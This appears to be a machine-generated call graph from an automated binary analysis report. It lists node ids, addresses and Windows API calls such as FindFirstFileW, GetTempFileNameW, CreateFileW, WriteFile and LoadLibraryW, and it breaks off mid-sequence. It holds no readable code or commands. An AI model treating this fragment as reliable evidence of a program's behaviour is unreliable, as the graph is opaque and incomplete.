2ce310 100 API calls 93330->93332 93336 2ce4ec 93332->93336 93333 2ce373 93334 2ce38c 93333->93334 93335 2ce394 GetTickCount 93333->93335 93334->93335 93452 3484da GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __Xtime_get_ticks 93335->93452 93337 2ef190 44 API calls 93336->93337 93339 2ce4fe 93337->93339 93341 1b7160 41 API calls 93339->93341 93340 2ce3a1 93342 1b9e20 51 API calls 93340->93342 93343 2ce569 93341->93343 93344 2ce3c1 93342->93344 93345 2ce5e6 93343->93345 93347 349842 3 API calls 93343->93347 93344->93328 93350 2ce3c9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 93344->93350 93346 1b6610 41 API calls 93345->93346 93364 2ce5f5 93346->93364 93348 2ce58c 93347->93348 93348->93345 93349 1b7160 41 API calls 93348->93349 93351 2ce5cb 93349->93351 93453 1b8d10 93350->93453 93469 3496fa 43 API calls 93351->93469 93353 349379 std::locale::_Init 2 API calls 93357 2ce6b6 93353->93357 93363 1b7160 41 API calls 93357->93363 93358 2ce5d5 93470 3497f8 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 93358->93470 93360 2ce40c 93457 2e3960 95 API calls 93360->93457 93362 2ce41a 93458 1b9620 93362->93458 93366 2ce70c 93363->93366 93364->93353 93368 1b7160 41 API calls 93366->93368 93367 2ce429 93367->93264 93369 2ce769 93368->93369 93370 1b6610 41 API calls 93369->93370 93371 2ce785 93370->93371 93372 1b6610 41 API calls 93371->93372 93373 2ce798 93372->93373 93374 1b6610 41 API calls 93373->93374 93375 2ce7a8 93374->93375 93376 1b6610 41 API calls 93375->93376 93377 2ce7ba 93376->93377 93378 1b78d0 40 API calls 93377->93378 93379 2ce7fe 93378->93379 93380 1b78d0 40 API calls 93379->93380 93381 2ce816 93380->93381 93382 2ce893 std::ios_base::_Ios_base_dtor 93381->93382 93385 1b78d0 40 API calls 93381->93385 93384 1b78d0 40 API calls 93382->93384 93405 2ce904 std::ios_base::_Ios_base_dtor 93382->93405 93383 1b78d0 40 API calls 93387 2ce924 93383->93387 93388 2ce8d5 93384->93388 93386 2ce870 93385->93386 93389 1b78d0 40 API calls 93386->93389 93390 1b78d0 40 API calls 93387->93390 93391 1b78d0 40 API calls 93388->93391 93392 2ce87c 93389->93392 93393 2ce930 93390->93393 93394 2ce8e7 93391->93394 93396 1b78d0 40 API calls 93392->93396 93397 1b78d0 40 API calls 93393->93397 93395 1b78d0 40 API calls 93394->93395 93398 2ce8f9 93395->93398 93399 2ce888 93396->93399 93400 2ce93f 93397->93400 93401 1b78d0 40 API calls 93398->93401 93402 1b78d0 40 API calls 93399->93402 93403 2ce954 93400->93403 93404 2ce983 GetCurrentProcess 93400->93404 93401->93405 93402->93382 93406 34933a _ValidateLocalCookies 5 API calls 93403->93406 93409 2ce999 93404->93409 93405->93383 93407 2cea50 93406->93407 93407->93264 93408 2ce9ff CloseHandle 93408->93403 93409->93403 93409->93408 93411 2ef220 93410->93411 93412 2ef26e GetEnvironmentVariableW 93411->93412 93413 2ef224 GetLastError 93411->93413 93414 2ef2ae 93412->93414 93420 2ef2f2 93412->93420 93413->93412 93415 2ef22f 93413->93415 93416 2ef2b5 93414->93416 93553 1bd410 41 API calls 93414->93553 93417 2ef239 93415->93417 93552 1bd410 41 API calls 93415->93552 93418 2ef2da GetEnvironmentVariableW 93416->93418 93417->93412 93418->93420 93422 2ef348 93420->93422 93423 1b7160 41 API calls 93420->93423 93424 1b7070 41 API calls 93422->93424 93423->93422 93425 2ef35d 93424->93425 93426 1b7070 41 API calls 93425->93426 93427 2ef373 93426->93427 93428 1b78d0 40 API calls 93427->93428 93429 2ef37f 93428->93429 93430 1b78d0 40 API calls 93429->93430 93431 2ef38b 93430->93431 93432 34933a _ValidateLocalCookies 5 API calls 93431->93432 93433 2ce4fe 93432->93433 93433->93267 93437 1b9e58 93436->93437 93449 1b9eac 93436->93449 93438 349842 3 API calls 93437->93438 93440 1b9e62 93438->93440 93439 349842 3 API calls 93441 1b9ec6 93439->93441 93442 1b9e6e GetProcessHeap 93440->93442 93440->93449 93450 1b9f37 93441->93450 93473 3496fa 43 API calls 93441->93473 93471 3496fa 43 API calls 93442->93471 93445 1b9e9b 93472 3497f8 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 93445->93472 93446 1b9f26 93474 3497f8 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 93446->93474 93449->93439 93449->93450 93450->93328 93451 2e3820 54 API calls 93450->93451 93451->93333 93452->93340 93475 1b9290 93453->93475 93456 2e3820 54 API calls 93456->93360 93457->93362 93459 1b962b 93458->93459 93460 1b963a 93459->93460 93461 1b9653 93459->93461 93462 1b9672 93459->93462 93460->93367 93550 1b98e0 40 API calls 4 library calls 93461->93550 93551 1b9820 42 API calls 93462->93551 93465 1b966a 93465->93367 93466 1b9677 93467 1b9620 42 API calls 93466->93467 93468 1b96b6 93467->93468 93468->93367 93469->93358 93470->93345 93471->93445 93472->93449 93473->93446 93474->93450 93476 1b92c3 93475->93476 93490 1b9361 93475->93490 93492 352d65 93476->93492 93477 1b9ae0 2 API calls 93478 1b93b6 93477->93478 93479 1b9ae0 2 API calls 93478->93479 93481 1b93c0 93479->93481 93482 1b9e20 51 API calls 93484 1b930f 93482->93484 93498 1b91d0 93484->93498 93487 1b9342 93509 352da6 93487->93509 93490->93477 93491 1b8d23 93490->93491 93491->93456 93493 352d79 __cftof 93492->93493 93515 34ee7f 93493->93515 93499 1b926b 93498->93499 93500 1b9201 93498->93500 93501 1b9ae0 2 API calls 93499->93501 93503 1b9221 93500->93503 93505 1b922e 93500->93505 93502 1b9275 93501->93502 93537 1b9120 50 API calls 93503->93537 93505->93505 93538 1b9990 42 API calls 3 library calls 93505->93538 93507 1b922c 93507->93487 93508 1b9870 42 API calls 93507->93508 93508->93487 93510 352dba __cftof 93509->93510 93539 34f0a1 93510->93539 93513 34e50b __cftof 40 API calls 93514 352de2 93513->93514 93514->93490 93516 34eece 93515->93516 93517 34eeab 93515->93517 93516->93517 93520 34eed6 93516->93520 93532 34e752 40 API calls 2 library calls 93517->93532 93519 34933a _ValidateLocalCookies 5 API calls 93521 34f000 93519->93521 93533 351652 53 API calls __cftof 93520->93533 93526 34e50b 93521->93526 93523 34ef57 93534 350b74 13 API calls ___free_lconv_mon 93523->93534 93525 34eec3 93525->93519 93527 34e517 93526->93527 93528 34e52e 93527->93528 93535 34e5b6 40 API calls 2 library calls 93527->93535 93531 1b92e3 93528->93531 93536 34e5b6 40 API calls 2 library calls 93528->93536 93531->93478 93531->93482 93531->93484 93532->93525 93533->93523 93534->93525 93535->93528 93536->93531 93537->93507 93538->93507 93540 34f0d0 93539->93540 93541 34f0ad 93539->93541 93543 34f0f7 93540->93543 93548 34eb88 53 API calls 2 library calls 93540->93548 93547 34e752 40 API calls 2 library calls 93541->93547 93546 34f0c8 93543->93546 93549 34e752 40 API calls 2 library calls 93543->93549 93546->93513 93547->93546 93548->93543 93549->93546 93550->93465 93551->93466 93552->93417 93553->93418 93554 2cbac0 93555 2cbb1a GetShortPathNameW 93554->93555 93556 2cbaf2 93554->93556 93558 2cbb2b 93555->93558 93578 2cbaff 93555->93578 93609 1e8820 RtlAllocateHeap RaiseException 93556->93609 93560 1b9e20 51 API calls 93558->93560 93559 2cbaf7 93610 1b96e0 93559->93610 93566 2cbb30 93560->93566 93562 2cbc17 93563 1b9ae0 2 API calls 93562->93563 93564 2cbc21 93563->93564 93567 1b9e20 51 API calls 93564->93567 93565 2cbc0d 93569 1b9ae0 2 API calls 93565->93569 93566->93562 93566->93565 93568 2cbb71 93566->93568 93615 1b9870 42 API calls 93566->93615 93570 2cbc61 93567->93570 93568->93565 93572 2cbb7d GetShortPathNameW 93568->93572 93569->93562 93573 2cbc6b 93570->93573 93574 2cbe30 93570->93574 93572->93578 93579 2cbb97 93572->93579 93626 2a9420 41 API calls 93573->93626 93575 1b9ae0 2 API calls 93574->93575 93576 2cbe3a 93575->93576 93579->93565 93581 2cbbb4 93579->93581 93580 2cbcaa 93627 2cbe40 93580->93627 93616 1e8790 44 API calls 93581->93616 93584 2cbbca 93617 1cfdb0 93584->93617 93585 2cbcc3 93587 2cbde6 93585->93587 93588 1b7160 41 API calls 93585->93588 93748 1b6ad0 40 API calls 2 library calls 93587->93748 93590 2cbd03 93588->93590 93592 2cbe40 123 API calls 93590->93592 93591 2cbdf2 93593 34933a _ValidateLocalCookies 5 API calls 93591->93593 93594 2cbd16 93592->93594 93595 2cbe2a 93593->93595 93596 1b78d0 40 API calls 93594->93596 93597 2cbd25 93596->93597 93597->93587 93598 1b7160 41 API calls 93597->93598 93599 2cbd67 93598->93599 93600 2cbe40 123 API calls 93599->93600 93601 2cbd7a 93600->93601 93609->93559 93611 1b9713 93610->93611 93612 1b9722 93610->93612 93611->93612 93613 1b9ae0 2 API calls 93611->93613 93612->93578 93614 1b977c 93613->93614 93615->93568 93616->93584 93618 1cfdc6 93617->93618 93619 1cfe13 93617->93619 93620 1cfe00 93618->93620 93621 1cfdd6 93618->93621 93619->93578 93749 1b9990 42 API calls 3 library calls 93620->93749 93623 1b9620 42 API calls 93621->93623 93625 1cfddc 93623->93625 93624 1cfe0b 93624->93578 93625->93578 93626->93580 93628 1b9e20 51 API calls 93627->93628 93629 2cbe78 93628->93629 93630 2cc0e2 93629->93630 93631 2cbe82 93629->93631 93632 1b9ae0 2 API calls 93630->93632 93805 1bcaf0 93631->93805 93633 2cc0ec 93632->93633 93634 1b9ae0 2 API calls 93633->93634 93635 2cc0f6 93634->93635 93638 2cc525 93635->93638 93640 2cc199 93635->93640 93641 2cc424 93635->93641 93639 1b9e20 51 API calls 93638->93639 93642 2cc54b 93639->93642 93750 2e6190 87 API calls _ValidateLocalCookies 93640->93750 93645 1b9e20 51 API calls 93641->93645 93646 2cc86b 93642->93646 93658 2cc56f 93642->93658 93659 2cc5b6 93642->93659 93643 1bcaf0 61 API calls 93647 2cbec6 93643->93647 93648 2cc429 93645->93648 93651 1b9ae0 2 API calls 93646->93651 93650 1b9e20 51 API calls 93647->93650 93648->93646 93775 2d6630 93648->93775 93649 2cc19e 93652 2cc29c 93649->93652 93653 2cc1a6 93649->93653 93655 2cbecf 93650->93655 93654 2cc875 93651->93654 93751 1bf830 93652->93751 93657 1b9e20 51 API calls 93653->93657 93655->93633 93660 2cbed9 93655->93660 93662 2cc1ab 93657->93662 93949 2a8280 43 API calls 2 library calls 93658->93949 93950 2a9420 41 API calls 93659->93950 93672 2cbef9 93660->93672 93673 2cbf04 93660->93673 93662->93646 93820 2c4d10 73 API calls 93662->93820 93664 2cc2ca 93669 1b78d0 40 API calls 93664->93669 93667 2cc581 93679 1b8d10 73 API calls 93667->93679 93668 1b78d0 40 API calls 93668->93664 93674 2cc30f 93669->93674 93817 1b9120 50 API calls 93672->93817 93818 1b9990 42 API calls 3 library calls 93673->93818 93922 2e6520 55 API calls std::ios_base::_Ios_base_dtor 93674->93922 93677 2cc601 93682 1b9e20 51 API calls 93677->93682 93684 2cc59f 93679->93684 93681 2cc31e 93923 2a8280 43 API calls 2 library calls 93681->93923 93715 2cc60d 93682->93715 93683 2cc1e2 93686 2cc23c 93683->93686 93692 1b9e20 51 API calls 93683->93692 93688 1b78d0 40 API calls 93684->93688 93685 2cbf02 93690 1bcaf0 61 API calls 93685->93690 93921 2c4950 84 API calls 93686->93921 93694 2cc5b1 93688->93694 93695 2cbf2a 93690->93695 93697 2cc1f9 93692->93697 93701 1b9e20 51 API calls 93694->93701 93819 2ab5a0 55 API calls _ValidateLocalCookies 93695->93819 93696 2cc27c 93707 1b78d0 40 API calls 93696->93707 93697->93646 93718 2cc203 93697->93718 93706 2cc6d9 93701->93706 93703 2cbf49 93713 1bcaf0 61 API calls 93703->93713 93706->93646 93720 1b9e20 51 API calls 93706->93720 93708 2cc84c 93707->93708 93711 34933a _ValidateLocalCookies 5 API calls 93708->93711 93716 2cc865 93711->93716 93717 2cbf5c 93713->93717 93715->93646 93719 1b8d10 73 API calls 93715->93719 93716->93585 93724 1bcaf0 61 API calls 93717->93724 93718->93686 93718->93718 93821 1cf3c0 93718->93821 93721 2cc683 93719->93721 93725 2cc708 93720->93725 93726 1b8d10 73 API calls 93721->93726 93744 2cbf73 93724->93744 93725->93646 93745 2cc712 93725->93745 93728 2cc69b 93726->93728 93951 1b6ad0 40 API calls 2 library calls 93728->93951 93739 2cc792 93739->93696 93953 2c4950 84 API calls 93739->93953 93741 2cc08b 93742 34933a _ValidateLocalCookies 5 API calls 93741->93742 93743 2cc0dc 93742->93743 93743->93585 93744->93741 93747 1b7160 41 API calls 93744->93747 93745->93739 93952 1b9990 42 API calls 3 library calls 93745->93952 93747->93741 93748->93591 93749->93624 93750->93649 93752 1bf881 93751->93752 93754 1bf900 93751->93754 93755 1b7160 41 API calls 93752->93755 93756 1b6610 41 API calls 93754->93756 93757 1bf8c9 93755->93757 93758 1bf920 93756->93758 93999 1bfe10 59 API calls 2 library calls 93757->93999 93760 1bf93e 93758->93760 93762 1b78d0 40 API calls 93758->93762 93764 1b78d0 40 API calls 93760->93764 93765 1bf959 93760->93765 93761 1bf8df 93763 1b6610 41 API calls 93761->93763 93762->93760 93767 1bf8e8 93763->93767 93764->93765 93766 1bf970 93765->93766 93768 1b78d0 40 API calls 93765->93768 93954 1bf9c0 93766->93954 93767->93754 93768->93766 93771 1b78d0 40 API calls 93772 1bf998 93771->93772 93773 34933a _ValidateLocalCookies 5 API calls 93772->93773 93774 1bf9b2 93773->93774 93774->93664 93774->93668 93776 2d66e4 93775->93776 94006 2d7950 93776->94006 93780 2d675f 93781 1b9620 42 API calls 93780->93781 93782 2d6794 93781->93782 93783 2d68d7 93782->93783 94089 2d9c40 69 API calls 93782->94089 94012 2b5b90 93783->94012 93787 2d681b 93789 1cf3c0 83 API calls 93787->93789 93791 2d682d 93789->93791 93792 2d7950 RaiseException 93791->93792 93793 2d6882 93792->93793 93793->93783 93794 2d6923 93793->93794 94090 1c7340 RaiseException 93794->94090 93796 2d692f 93797 2d6a64 93796->93797 93798 2d6ac5 93796->93798 94091 2d79a0 83 API calls 93797->94091 93800 1b9ae0 2 API calls 93798->93800 93803 2d6acf 93800->93803 93801 2d6a70 93802 1cfdb0 42 API calls 93801->93802 93804 2d6a80 93802->93804 93806 1b9e20 51 API calls 93805->93806 93807 1bcb1f 93806->93807 93808 1bcb8f 93807->93808 93809 1bcb25 93807->93809 93810 1b9ae0 2 API calls 93808->93810 93812 1bcb45 93809->93812 93813 1bcb52 93809->93813 93811 1bcb99 93810->93811 94119 1b9120 50 API calls 93812->94119 93813->93813 94120 1b9990 42 API calls 3 library calls 93813->94120 93816 1bcb50 93816->93643 93817->93685 93818->93685 93819->93703 93820->93683 93822 1cf444 93821->93822 93824 1cf3e2 93821->93824 93823 1b9ae0 2 API calls 93822->93823 93833 1cf44e 93822->93833 93825 1cf46b 93823->93825 93824->93822 93826 1cf427 93824->93826 94121 1b9870 42 API calls 93824->94121 93827 1cf4de 93825->93827 93829 1cf4d1 FindClose 93825->93829 94122 1b98e0 40 API calls 4 library calls 93826->94122 93831 1b96e0 2 API calls 93827->93831 93829->93827 93832 1cf4fa 93831->93832 93834 1bcaf0 61 API calls 93832->93834 93833->93686 93837 1cf50d 93834->93837 93835 1cf777 FindFirstFileW 93836 1cf78f GetFullPathNameW 93835->93836 93900 1cf84c 93835->93900 93838 1cf7a8 93836->93838 93894 1cf8e1 93836->93894 93837->93835 93839 1cf67e 93837->93839 93840 1cf547 93837->93840 93837->93900 93842 1cf7c3 GetFullPathNameW 93838->93842 94142 1b9870 42 API calls 93838->94142 93843 1c3120 69 API calls 93839->93843 93844 1c3120 69 API calls 93840->93844 93841 1b9ae0 2 API calls 93845 1cf95c 93841->93845 93847 1cf7df 93842->93847 93870 1cf686 93843->93870 93855 1cf54f 93844->93855 93848 1b9620 42 API calls 93845->93848 93849 1cf886 93847->93849 93857 1cf816 93847->93857 93847->93894 93855->93835 94123 1c33d0 93855->94123 93870->93835 93871 1cf71d 93870->93871 93870->93894 94139 1b9870 42 API calls 93870->94139 94140 1cfe20 40 API calls 3 library calls 93871->94140 93894->93841 93894->93900 93900->93686 93921->93696 93922->93681 93949->93667 93950->93677 93951->93694 93952->93739 93953->93696 93955 1bfa27 GetTempFileNameW 93954->93955 93956 1bfa25 93954->93956 93957 1bfa6e 93955->93957 93958 1bfa3c 93955->93958 93956->93955 93960 1b7160 41 API calls 93957->93960 93959 34933a _ValidateLocalCookies 5 API calls 93958->93959 93961 1bf980 93959->93961 93962 1bfad0 93960->93962 93961->93771 93963 1bfd7b 93962->93963 93964 1bfad8 93962->93964 93966 1b6610 41 API calls 93963->93966 93965 1b6610 41 API calls 93964->93965 93967 1bfb03 93965->93967 93968 1bfda6 93966->93968 94000 2a8560 43 API calls _ValidateLocalCookies 93967->94000 94004 2a8560 43 API calls _ValidateLocalCookies 93968->94004 93971 1bfb12 94001 2a89b0 40 API calls 93971->94001 93972 1bfdb5 94005 2a89b0 40 API calls 93972->94005 93975 1bfb28 93977 1b78d0 40 API calls 93975->93977 93976 1bfdc7 93978 1b78d0 40 API calls 93976->93978 93979 1bfb37 93977->93979 93978->93958 93979->93979 93980 1b7160 41 API calls 93979->93980 93999->93761 94000->93971 94001->93975 94004->93972 94005->93976 94007 2d66eb 94006->94007 94008 2d7960 94006->94008 94011 1c7340 RaiseException 94007->94011 94008->94007 94092 1c7340 RaiseException 94008->94092 94010 2d7991 94011->93780 94013 1b9620 42 API calls 94012->94013 94014 2b5bd3 94013->94014 94015 1cf3c0 83 API calls 94014->94015 94016 2b5c1a 94015->94016 94093 29bff0 94016->94093 94018 2b5c22 94022 2b5ccd GetFileAttributesW 94018->94022 94024 2b5d31 94018->94024 94025 2b5b90 84 API calls 94018->94025 94026 2b5d16 FindNextFileW 94018->94026 94022->94018 94100 29c0a0 94024->94100 94025->94022 94026->94018 94026->94024 94089->93787 94090->93796 94091->93801 94092->94010 94094 29c052 std::locale::_Setgloballocale 94093->94094 94095 1b9e20 51 API calls 94094->94095 94096 29c06a 94095->94096 94097 29c070 94096->94097 94098 1b9ae0 2 API calls 94096->94098 94097->94018 94099 29c09e 94098->94099 94101 29c0f1 94100->94101 94119->93816 94120->93816 94121->93826 94122->93822 94124 1c34ce 94123->94124 94125 1c3427 94123->94125 94139->93871 94142->93842 94169 1e6d50 94170 1e6d63 std::ios_base::_Ios_base_dtor 94169->94170 94175 34ae53 94170->94175 94173 1e6d8b 94174 1e6d79 SetUnhandledExceptionFilter 94174->94173 94180 34ae8b 94175->94180 94178 34ae8b __set_se_translator 51 API calls 94179 1e6d6d 94178->94179 94179->94173 94179->94174 94194 34ae99 94180->94194 94182 34ae5c 94182->94178 94183 34ae90 94183->94182 94210 3629fe EnterCriticalSection std::locale::_Setgloballocale 94183->94210 94185 352e70 94186 352e7b 94185->94186 94211 362a43 40 API calls 5 library calls 94185->94211 94188 352e85 IsProcessorFeaturePresent 94186->94188 94189 352ea4 94186->94189 94191 352e91 94188->94191 94213 35eb32 94189->94213 94212 34e5d3 8 API calls 2 library calls 94191->94212 94195 34aea5 GetLastError 94194->94195 94196 34aea2 94194->94196 94216 34e1a7 6 API calls ___vcrt_FlsGetValue 94195->94216 94196->94183 94198 34aeba 94199 34af1f SetLastError 94198->94199 94209 34aed9 94198->94209 94217 34e1e2 6 API calls ___vcrt_FlsGetValue 94198->94217 94199->94183 94201 34aed3 94201->94209 94218 35bb01 14 API calls __dosmaperr 94201->94218 94209->94199 94210->94185 94211->94186 94212->94189 94219 35e956 94213->94219 94216->94198 94217->94201 94220 35e995 94219->94220 94221 35e983 94219->94221 94231 35e7ff 94220->94231 94244 35ea1e GetModuleHandleW 94221->94244 94224 35e9cc 94226 352eae 94224->94226 94237 35e9ed 94224->94237 94225 35e988 94225->94220 94245 35ea83 GetModuleHandleExW 94225->94245 94232 35e80b std::locale::_Setgloballocale 94231->94232 94251 35cc5a EnterCriticalSection 94232->94251 94234 35e815 94252 35e86b 94234->94252 94236 35e822 std::locale::_Setgloballocale 94236->94224 94271 35ea61 94237->94271 94240 35ea0b 94242 35ea83 std::locale::_Setgloballocale 3 API calls 94240->94242 94241 35e9fb GetCurrentProcess TerminateProcess 94241->94240 94243 35ea13 ExitProcess 94242->94243 94244->94225 94246 35eae3 94245->94246 94247 35eac2 GetProcAddress 94245->94247 94249 35e994 94246->94249 94250 35eae9 FreeLibrary 94246->94250 94247->94246 94248 35ead6 94247->94248 94248->94246 94249->94220 94250->94249 94251->94234 94253 35e877 std::locale::_Setgloballocale 94252->94253 94254 35e8de std::locale::_Setgloballocale 94253->94254 94256 35f43d 94253->94256 94254->94236 94257 35f449 __EH_prolog3 94256->94257 94260 35f195 94257->94260 94259 35f470 std::locale::_Init 94259->94254 94261 35f1a1 std::locale::_Setgloballocale 94260->94261 94266 35cc5a EnterCriticalSection 94261->94266 94263 35f1af 94267 35f34d 94263->94267 94265 35f1bc std::locale::_Setgloballocale 94265->94259 94266->94263 94268 35f364 94267->94268 94269 35f36c 94267->94269 94268->94265 94269->94268 94270 3616fd ___free_lconv_mon 13 API calls 94269->94270 94270->94268 94276 3638e2 6 API calls std::locale::_Setgloballocale 94271->94276 94273 35ea66 94274 35e9f7 94273->94274 94275 35ea6b GetPEB 94273->94275 94274->94240 94274->94241 94275->94274 94276->94273 94277 302480 94288 301db0 94277->94288 94280 3024aa 94297 302550 94280->94297 94282 1b7160 41 API calls 94282->94280 94289 1b7160 41 API calls 94288->94289 94293 301dc8 94289->94293 94290 301de0 94367 304210 94290->94367 94291 1b78d0 40 API calls 94291->94293 94293->94290 94293->94291 94294 301df8 94296 301e1e 94294->94296 94371 1b8590 40 API calls 2 library calls 94294->94371 94296->94280 94296->94282 94298 30259a 94297->94298 94326 3028a1 94297->94326 94300 1b7160 41 API calls 94298->94300 94299 34933a _ValidateLocalCookies 5 API calls 94301 3024ba 94299->94301 94302 3025c0 94300->94302 94334 3028d0 94301->94334 94303 302762 94302->94303 94320 3025cf 94302->94320 94304 1b7070 41 API calls 94303->94304 94305 3026b2 94304->94305 94375 1b8d30 41 API calls std::_Throw_Cpp_error 94305->94375 94307 3026c6 94376 1b8dd0 41 API calls 94307->94376 94309 1b7160 41 API calls 94309->94320 94310 3026d9 94311 1b7070 41 API calls 94310->94311 94313 3026f5 94311->94313 94314 1b78d0 40 API calls 94313->94314 94316 302701 94314->94316 94317 1b78d0 40 API calls 94316->94317 94319 30270d 94317->94319 94318 1b7070 41 API calls 94318->94320 94322 1b7070 41 API calls 94319->94322 94332 30273e 94319->94332 94320->94305 94320->94309 94320->94318 94321 1b78d0 40 API calls 94320->94321 94373 1ddd80 41 API calls 94320->94373 94374 1b8dd0 41 API calls 94320->94374 94321->94320 94323 302720 94322->94323 94323->94323 94324 1b7070 41 API calls 94323->94324 94324->94332 94325 1b78d0 40 API calls 94325->94326 94326->94299 94327 1b7160 41 API calls 94327->94332 94330 1b7070 41 API calls 94330->94332 94331 1b78d0 40 API calls 94331->94332 94332->94327 94332->94330 94332->94331 94333 302846 94332->94333 94377 1ddd80 41 API calls 94332->94377 94378 1b8dd0 41 API calls 94332->94378 94333->94325 94337 302918 94334->94337 94338 302911 94334->94338 94335 34933a _ValidateLocalCookies 5 API calls 94336 3024c1 94335->94336 94344 302ab0 94336->94344 94339 3029e1 94337->94339 94341 1b7160 41 API calls 94337->94341 94379 1e6270 41 API calls 94337->94379 94338->94335 94339->94338 94380 3536b5 45 API calls 94339->94380 94381 303e80 42 API calls std::locale::_Locimp::_Locimp 94339->94381 94341->94337 94345 303273 94344->94345 94364 302b10 std::ios_base::_Ios_base_dtor std::locale::_Setgloballocale 94344->94364 94346 34933a _ValidateLocalCookies 5 API calls 94345->94346 94347 3024cc 94346->94347 94348 349379 std::locale::_Init 2 API calls 94348->94364 94352 1b7160 41 API calls 94352->94364 94354 303d30 42 API calls 94354->94364 94363 1b7070 41 API calls 94363->94364 94364->94345 94364->94348 94364->94352 94364->94354 94364->94363 94366 1b78d0 40 API calls 94364->94366 94382 301a50 50 API calls __Init_thread_footer 94364->94382 94383 1b8dd0 41 API calls 94364->94383 94384 302330 94364->94384 94396 304290 94364->94396 94430 2abca0 41 API calls _ValidateLocalCookies 94364->94430 94431 1bd410 41 API calls 94364->94431 94432 2b1010 41 API calls 5 library calls 94364->94432 94433 2b9c40 41 API calls 5 library calls 94364->94433 94434 304640 41 API calls std::locale::_Locimp::_Locimp 94364->94434 94435 303fe0 41 API calls 4 library calls 94364->94435 94436 1b8590 40 API calls 2 library calls 94364->94436 94437 304550 94364->94437 94442 1df4c0 40 API calls std::ios_base::_Ios_base_dtor 94364->94442 94366->94364 94368 304242 std::ios_base::_Ios_base_dtor 94367->94368 94369 304276 94367->94369 94368->94369 94372 1df4c0 40 API calls std::ios_base::_Ios_base_dtor 94368->94372 94369->94294 94371->94294 94372->94368 94373->94320 94374->94320 94375->94307 94376->94310 94377->94332 94378->94332 94379->94337 94380->94339 94381->94339 94382->94364 94383->94364 94385 30237d 94384->94385 94386 30237f CreateFileW 94384->94386 94385->94386 94387 30239f 94386->94387 94443 1cf330 94387->94443 94389 3023ce std::locale::_Setgloballocale 94390 302437 94389->94390 94391 30241a WriteFile 94389->94391 94460 1b8590 40 API calls 2 library calls 94390->94460 94391->94389 94391->94390 94393 302449 94394 30246c 94393->94394 94395 30245e CloseHandle 94393->94395 94394->94364 94395->94394 94397 3042e0 94396->94397 94398 304487 94396->94398 94399 304482 94397->94399 94403 304353 94397->94403 94404 30432c 94397->94404 94467 1b6ac0 41 API calls std::_Throw_Cpp_error 94398->94467 94466 1b7730 41 API calls 3 library calls 94399->94466 94402 304428 94429 30444d std::ios_base::_Ios_base_dtor 94402->94429 94468 34e7df 40 API calls 2 library calls 94402->94468 94409 349379 std::locale::_Init 2 API calls 94403->94409 94412 30433d 94403->94412 94404->94399 94406 304337 94404->94406 94408 349379 std::locale::_Init 2 API calls 94406->94408 94408->94412 94409->94412 94412->94402 94414 304550 41 API calls 94412->94414 94415 30438f 94414->94415 94417 3043a1 94415->94417 94418 3043ee 94415->94418 94422 3043d4 94417->94422 94424 304550 41 API calls 94417->94424 94464 3048d0 41 API calls std::locale::_Init 94418->94464 94425 304210 40 API calls 94422->94425 94423 3043f9 94465 3048d0 41 API calls std::locale::_Init 94423->94465 94424->94417 94427 3043e3 94425->94427 94428 304210 40 API calls 94427->94428 94427->94429 94428->94402 94429->94364 94430->94364 94431->94364 94432->94364 94433->94364 94434->94364 94435->94364 94436->94364 94438 349379 std::locale::_Init 2 API calls 94437->94438 94439 304599 94438->94439 94469 304a40 94439->94469 94442->94364 94444 1cf340 94443->94444 94445 1cf3a3 94443->94445 94447 1cf348 94444->94447 94448 1cf376 94444->94448 94461 1b6ac0 41 API calls std::_Throw_Cpp_error 94445->94461 94449 1cf3a8 94447->94449 94450 1cf34f 94447->94450 94451 1cf392 94448->94451 94454 349379 std::locale::_Init 2 API calls 94448->94454 94462 1b7730 41 API calls 3 library calls 94449->94462 94453 349379 std::locale::_Init 2 API calls 94450->94453 94451->94389 94455 1cf355 94453->94455 94456 1cf380 94454->94456 94458 1cf35e 94455->94458 94463 34e7df 40 API calls 2 library calls 94455->94463 94456->94389 94458->94389 94460->94393 94462->94455 94464->94423 94465->94427 94466->94398 94470 304a82 94469->94470 94471 3045c7 94469->94471 94472 349379 std::locale::_Init 2 API calls 94470->94472 94471->94364 94473 304aa4 94472->94473 94474 1b6610 41 API calls 94473->94474 94475 304aba 94474->94475 94476 1b6610 41 API calls 94475->94476 94477 304aca 94476->94477 94478 304a40 41 API calls 94477->94478 94479 304b1e 94478->94479 94480 304a40 41 API calls 94479->94480 94480->94471 94481 2184f0 94484 2d4b70 GetLastError 94481->94484 94482 218567 94485 2d4b7a 94484->94485 94486 1b9ae0 2 API calls 94485->94486 94487 2d4b88 94486->94487 94491 2d4be6 94487->94491 94495 2b9dd0 94487->94495 94491->94482 94508 2b9490 LoadLibraryW 94495->94508 94498 2b9490 3 API calls 94499 2b9e00 94498->94499 94500 2d4de0 94499->94500 94501 2d4e06 94500->94501 94502 34933a _ValidateLocalCookies 5 API calls 94501->94502 94503 2d4bc7 94502->94503 94504 2192b0 94503->94504 94507 2192fd 94504->94507 94505 34933a _ValidateLocalCookies 5 API calls 94506 21946e 94505->94506 94506->94482 94507->94505 94509 2b94eb GetProcAddress 94508->94509 94510 2b94fb 94508->94510 94509->94510 94511 2b956e FreeLibrary 94510->94511 94512 2b957c 94510->94512 94511->94512 94512->94498 94513 6a54d2c0 94515 6a54d357 94513->94515 94514 6a54d3e9 94516 6a54d3fe 94514->94516 94517 6a546a10 43 API calls 94514->94517 94515->94514 94520 6a546a10 43 API calls 94515->94520 94518 6a56cbfb std::_Facet_Register 16 API calls 94516->94518 94517->94516 94519 6a54d409 94518->94519 94521 6a545ef0 43 API calls 94519->94521 94520->94514 94522 6a54d423 94521->94522 94523 6a546a10 43 API calls 94522->94523 94524 6a54d468 94523->94524 94525 6a54a2c0 49 API calls 94524->94525 94526 6a54d477 94525->94526 94527 6a54d4d9 94526->94527 94713 6a552330 140 API calls 94526->94713 94528 6a547130 57 API calls 94527->94528 94529 6a54d4f0 94528->94529 94530 6a547130 57 API calls 94529->94530 94532 6a54d5d5 94529->94532 94533 6a54d4ff 94530->94533 94531 6a54d627 94534 6a547090 41 API calls 94531->94534 94532->94531 94712 6a552400 139 API calls 94532->94712 94535 6a547e10 55 API calls 94533->94535 94536 6a54d636 94534->94536 94538 6a54d506 94535->94538 94537 6a56cbbc codecvt 5 API calls 94536->94537 94539 6a54d650 94537->94539 94540 6a54d654 94538->94540 94543 